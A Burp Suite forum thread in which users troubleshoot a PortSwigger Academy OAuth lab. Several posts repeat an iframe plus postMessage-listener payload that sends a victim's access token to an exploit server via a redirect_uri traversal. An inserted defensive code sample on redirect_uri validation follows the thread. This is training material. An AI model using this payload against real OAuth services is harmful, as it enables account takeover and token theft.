Burp Suite User Forum


OAuth lab: Can't complete Stealing OAuth access tokens via a proxy page lab

sanjogc | Last updated: Oct 22, 2022 04:30PM UTC

Hello PortSwigger team. I am not able to complete the above lab. I tried the payload in the solutions:

    <iframe src="https://YOUR-LAB-AUTH-SERVER/auth?client_id=YOUR-LAB-CLIENT_ID&redirect_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-callback/../post/comment/comment-form&response_type=token&nonce=-1552239120&scope=openid%20profile%20email"></iframe>
    <script>
        window.addEventListener('message', function(e) {
            fetch("/" + encodeURIComponent(e.data.data))
        }, false)
    </script>

This payload almost gets me the token in Burp Suite, but the browser is not cooperating. I understand the solution given: the comment-form will use postMessage to send a message to the parent, and we are listening for the event and sending the fragment to the exploit server. Firefox does not even send cookies to the OAuth server, so I moved to the Burp browser. The Burp browser does the iframe work, but the listener is not working.

sanjogc | Last updated: Oct 22, 2022 04:35PM UTC

The code inside the script does not run, not even console.log().

sanjogc | Last updated: Oct 22, 2022 04:45PM UTC

Sorry to disturb. The solution seems to be upside down. I just casually put the listener code above the iframe. It worked finally... Is it just me who had this issue?

Ben, PortSwigger Agent | Last updated: Oct 24, 2022 01:02PM UTC

Hi, I have just run through this lab and have been able to solve it using the solution provided so it does appear to be working as expected. If it helps, the content of my exploit server was as follows:

    <iframe src="https://oauth-0a09007904283086c0572bcd02c900af.web-security-academy.net/auth?client_id=mcaunb0dt6vo606215jyh&redirect_uri=https://0a74004404f3307dc0c42b4000690037.web-security-academy.net/oauth-callback/../post/comment/comment-form&response_type=token&nonce=-1691750255&scope=openid%20profile%20email"></iframe>
    <script>
        window.addEventListener('message', function(e) {
            fetch("/" + encodeURIComponent(e.data.data))
        }, false)
    </script>
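An added example, not part of any post in this thread and not PortSwigger's code: the redirect_uri in the payloads above carries a `../` segment after `/oauth-callback`. Assuming an authorization server that validates redirect_uri by prefix (the thread does not show the server's actual check), this sketch contrasts that with exact matching; the host `client.example` and all function names are constructed for illustration.

```javascript
// Added example: constructed host and hypothetical helper names.
const REGISTERED = ["https://client.example/oauth-callback"];

// Weak check (assumed for illustration): accepts any URI that merely
// starts with a registered callback.
function weakPrefixCheck(candidate, registered = REGISTERED) {
  return registered.some((r) => candidate.startsWith(r));
}

// Where a browser ends up once the URL parser has resolved dot segments.
function effectiveTarget(candidate) {
  const url = new URL(candidate);
  return url.origin + url.pathname;
}

// Hardened check: the raw string must parse, be https, carry no fragment,
// survive normalisation unchanged, and equal a registered URI exactly.
function strictCheck(candidate, registered = REGISTERED) {
  let url;
  try {
    url = new URL(candidate);
  } catch {
    return false;
  }
  if (url.protocol !== "https:" || url.hash !== "") return false;
  if (url.href !== candidate) return false; // parser rewrote it: reject
  return registered.includes(candidate);
}

// Constructed sample inputs mirroring the shape of the redirect_uri above.
const SAMPLES = [
  "https://client.example/oauth-callback",
  "https://client.example/oauth-callback/../post/comment/comment-form",
  "https://client.example/oauth-callback/%2e%2e/post/comment/comment-form",
];

function audit(samples = SAMPLES) {
  return samples.map((s) => ({
    candidate: s,
    lands_on: effectiveTarget(s),
    weak: weakPrefixCheck(s),
    strict: strictCheck(s),
  }));
}

console.table(audit());
```

Exact matching of the full registered URI rejects both traversal forms, while the prefix check accepts them even though the browser lands on a different page.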

Steven | Last updated: Feb 06, 2023 11:06PM UTC

Hello, I am having an issue with this lab as well. I followed the solution as written and when I view the exploit, instead of the comment page I get this error instead:

    SessionNotFound: invalid_request
        at Provider.getInteraction (/opt/node-v18.12.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:50:11)
        at Provider.interactionDetails (/opt/node-v18.12.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:228:27)
        at /home/carlos/oauth/index.js:160:34
        at Layer.handle [as handle_request] (/opt/node-v18.12.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)
        at next (/opt/node-v18.12.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13)
        at setNoCache (/home/carlos/oauth/index.js:121:5)
        at Layer.handle [as handle_request] (/opt/node-v18.12.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)
        at next (/opt/node-v18.12.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13)
        at Route.dispatch (/opt/node-v18.12.1-linux-x64/lib/node_modules/express/lib/router/route.js:112:3)
        at Layer.handle [as handle_request] (/opt/node-v18.12.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)

I have cleared cookies and redid the lab several times and I get the same error. Any help would be appreciated!

Ben, PortSwigger Agent | Last updated: Feb 07, 2023 10:57AM UTC

Hi Steven, Are you able to provide a screenshot of the exploit that you have configured within the Exploit Server?

Bipin | Last updated: Dec 04, 2023 09:31AM UTC

Hello, I'm also getting the same SessionNotFound error. Here's my code:

    <iframe src="https://oauth-0afb00e5043ee5b08080e70202b000d6.oauth-server.net/auth?client_id=hxolfwvj6keyhmt9legrv&redirect_uri=https://0ac40081042ae57780b6e96f0040004c.web-security-academy.net/oauth-callback/../post/comment/comment-form&response_type=token&nonce=-1457167127&scope=openid%20profile%20email" height="100%" width="100%"></iframe>
    <script>
        window.addEventListener('message', function(e) {
            fetch("/" + encodeURIComponent(e.data.data))
        }, false)
    </script>

And the error I'm getting is:

    SessionNotFound: invalid_request
        at Provider.getInteraction (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:50:11)
        at Provider.interactionDetails (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:228:27)
        at /home/carlos/oauth/index.js:160:34
        at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)
        at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13)
        at setNoCache (/home/carlos/oauth/index.js:121:5)
        at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)
        at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13)
        at Route.dispatch (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:112:3)
        at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)

Ben, PortSwigger Agent | Last updated: Dec 04, 2023 10:48AM UTC

Hi, Which browser are you using when you attempt to carry out this lab?

Nemeses5174 | Last updated: Mar 20, 2024 11:53AM UTC

Hi, I have the same problem. The "iframe" solution doesn't work with a proxy; it is necessary to use a proxy-free version of Chrome. I don't know why. Does anyone have an idea? Thanks

Ben, PortSwigger Agent | Last updated: Mar 21, 2024 08:24AM UTC

Hi, It is possible that a flag that is enabled with the embedded browser is causing issues with this lab. Whilst we resolve this issue, it does look as though using a normal version of Chrome should still allow you to solve this lab.
